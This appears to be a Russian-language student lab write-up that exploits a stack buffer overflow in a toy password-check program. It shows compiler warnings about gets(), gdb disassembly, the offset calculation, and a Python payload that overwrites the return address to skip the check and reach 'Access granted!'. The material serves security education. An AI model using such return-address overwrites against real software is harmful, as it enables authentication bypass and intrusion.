При компиляции файла командой "gcc -fno-stack-protector -no-pie -o T5_2 Task5_2.c"
Копилятор выдает предупреждение об опасности функции ‘IsPassOk’:
Task5_2.c: In function ‘IsPassOk’:
Task5_2.c:28:5: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
   28 |     gets(Pass);
      |     ^~~~
      |     fgets
/usr/bin/ld: /tmp/ccJyl99W.o: в функции «IsPassOk»:
Task5_2.c:(.text+0x71): предупреждение: the `gets' function is dangerous and should not be used. (проблема в том, что функция не проверяет границы)

Запускаем gdb ./T5_2 и вводим команду "disas IsPassOk"
Dump of assembler code for function IsPassOk:
   0x00000000004011ee <+0>:     endbr64
   0x00000000004011f2 <+4>:     push   %rbp
   0x00000000004011f3 <+5>:     mov    %rsp,%rbp
   0x00000000004011f6 <+8>:     sub    $0x10,%rsp // выделяем 16 байт в стеке (буфер 12 + выравнивание)
   0x00000000004011fa <+12>:    lea    -0xc(%rbp),%rax Pass = rbp-0xc (12 байт)
   0x00000000004011fe <+16>:    mov    %rax,%rdi
   0x0000000000401201 <+19>:    mov    $0x0,%eax
   0x0000000000401206 <+24>:    call   0x401090 <gets@plt>
   0x000000000040120b <+29>:    lea    -0xc(%rbp),%rax
   0x000000000040120f <+33>:    lea    0xe1c(%rip),%rdx        # 0x402032
   0x0000000000401216 <+40>:    mov    %rdx,%rsi
   0x0000000000401219 <+43>:    mov    %rax,%rdi
   0x000000000040121c <+46>:    call   0x401080 <strcmp@plt>
   0x0000000000401221 <+51>:    test   %eax,%eax
   0x0000000000401223 <+53>:    sete   %al
   0x0000000000401226 <+56>:    movzbl %al,%eax
   0x0000000000401229 <+59>:    leave
   0x000000000040122a <+60>:    ret

От начала буфера (rbp-0xc):

До конца буфера: rbp (12 байт)

До конца saved RBP: rbp+0x8 (20 байт)

До начала return address: rbp+0x8 (20 байт) -> длина массива для ввода пароля: 20 байт

А адрес ветки условия проверки корректности ввода пароля: 0x401223

Вводим команду disas main:
Dump of assembler code for function main:
   0x0000000000401196 <+0>:     endbr64
   0x000000000040119a <+4>:     push   %rbp
   0x000000000040119b <+5>:     mov    %rsp,%rbp
   0x000000000040119e <+8>:     sub    $0x10,%rsp
   0x00000000004011a2 <+12>:    lea    0xe5b(%rip),%rax        # 0x402004
   0x00000000004011a9 <+19>:    mov    %rax,%rdi
   0x00000000004011ac <+22>:    call   0x401070 <puts@plt>
   0x00000000004011b1 <+27>:    call   0x4011ee <IsPassOk>
   0x00000000004011b6 <+32>:    mov    %eax,-0x4(%rbp) // сохранение результата
   0x00000000004011b9 <+35>:    cmpl   $0x0,-0x4(%rbp) // сравнение с 0
   0x00000000004011bd <+39>:    jne    0x4011d8 <main+66> // если не 0, переход к "Access granted!"
   0x00000000004011bf <+41>:    lea    0xe4e(%rip),%rax        # 0x402014
   0x00000000004011c6 <+48>:    mov    %rax,%rdi
   0x00000000004011c9 <+51>:    call   0x401070 <puts@plt>
   0x00000000004011ce <+56>:    mov    $0x1,%edi
   0x00000000004011d3 <+61>:    call   0x4010a0 <exit@plt>
   0x00000000004011d8 <+66>:    lea    0xe43(%rip),%rax        # 0x402022
   0x00000000004011df <+73>:    mov    %rax,%rdi
   0x00000000004011e2 <+76>:    call   0x401070 <puts@plt>
   0x00000000004011e7 <+81>:    mov    $0x0,%eax
   0x00000000004011ec <+86>:    leave
   0x00000000004011ed <+87>:    ret

Создаем экссплойт:
python3 -c '
import sys
# "test" пароль + выравнивание до 20 байт + адрес 0x4011d8
payload = b"test\x00" + b"A"*15 + b"\xd8\x11\x40\x00\x00\x00\x00\x00"
sys.stdout.buffer.write(payload)
' > exploit.bin

Его запуск (./T5_2 < exploit.bin) выдает:
Enter password:
Access granted!